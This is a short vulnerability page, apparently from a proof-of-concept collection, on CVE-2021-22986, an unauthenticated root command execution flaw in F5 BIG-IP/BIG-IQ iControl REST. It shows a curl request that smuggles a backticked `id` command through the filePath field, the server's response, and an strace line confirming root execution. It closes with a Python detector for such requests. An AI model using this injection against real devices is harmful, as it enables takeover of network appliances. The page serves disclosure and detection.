    BIG-IP- BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986).md
    1.46 KB / 2021-05-21 09:14:38
    # BIG-IP/BIG-IQ iControl REST Unauthenticated RCE (CVE-2021-22986)
    
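    This vulnerability allows an unauthenticated attacker who has network access to the iControl REST interface, through the BIG-IP management interface and IP addresses, to execute arbitrary system commands, create or delete files, and disable services. It can only be exploited through the control plane, not through the data plane.
    
    Details: https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986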
    
    **PoC:**
    
    ```console
    wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
    {
      "filePath": "`id`",
      "toBeInstalledAppRpmsIndex": -1,
      "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
      "status": "CREATED",
      "userReference": {
        "link": "https://localhost/mgmt/shared/authz/users/admin"
      },
      "identityReferences": [
        {
          "link": "https://localhost/mgmt/shared/authz/users/admin"
        }
      ],
      "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
      "generation": 1,
      "lastUpdateMicros": 1615930477819656,
      "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
      "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
    }
    wvu@kharak:~$
    ```
    
    The `id` command is executed as root, and its output ends up in the arguments passed to `tar`:
    
    ```
    [pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0
    ```
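
A detection check for the request shown in the PoC above, added here as an example (it is not part of the original page or of any F5 tooling): it flags POSTs to `/mgmt/tm/access/bundle-install-tasks` whose `filePath` contains shell metacharacters. The record shape (`src`, `method`, `path`, `body`) and the sample records are assumptions constructed for illustration.

```python
import json
import re

# Endpoint and field name are taken from the PoC on this page.
TASK_PATH = "/mgmt/tm/access/bundle-install-tasks"
# Characters a shell uses for substitution, chaining, redirection or grouping.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\n]")

def suspicious_file_path(value):
    """Return why a filePath value is suspect, or None if it looks like a plain path."""
    if not isinstance(value, str):
        return "filePath is not a string"
    if SHELL_META.search(value):
        return "shell metacharacter in filePath"
    return None

def scan(records):
    """Return (src, reason) for each POST to the task endpoint with a suspect body.

    Each record is a dict with keys src, method, path, body. This shape is an
    assumption (for example, a request capture from a proxy in front of the
    management interface), not a native BIG-IP log format.
    """
    findings = []
    for rec in records:
        if rec.get("method") != "POST":
            continue
        if rec.get("path", "").split("?", 1)[0].rstrip("/") != TASK_PATH:
            continue
        try:
            value = json.loads(rec.get("body") or "")["filePath"]
        except (ValueError, KeyError, TypeError):
            findings.append((rec.get("src"), "malformed body or missing filePath"))
            continue
        reason = suspicious_file_path(value)
        if reason:
            findings.append((rec.get("src"), reason))
    return findings

# Constructed sample records (not real traffic); addresses are documentation ranges.
SAMPLE = [
    {"src": "198.51.100.7", "method": "POST", "path": TASK_PATH, "body": '{"filePath":"`id`"}'},
    {"src": "192.0.2.10", "method": "POST", "path": TASK_PATH, "body": '{"filePath":"/var/tmp/bundle.tar"}'},
    {"src": "192.0.2.11", "method": "GET", "path": TASK_PATH, "body": ""},
    {"src": "198.51.100.9", "method": "POST", "path": TASK_PATH + "/", "body": '{"filePath":"/tmp/a;id"}'},
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```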
    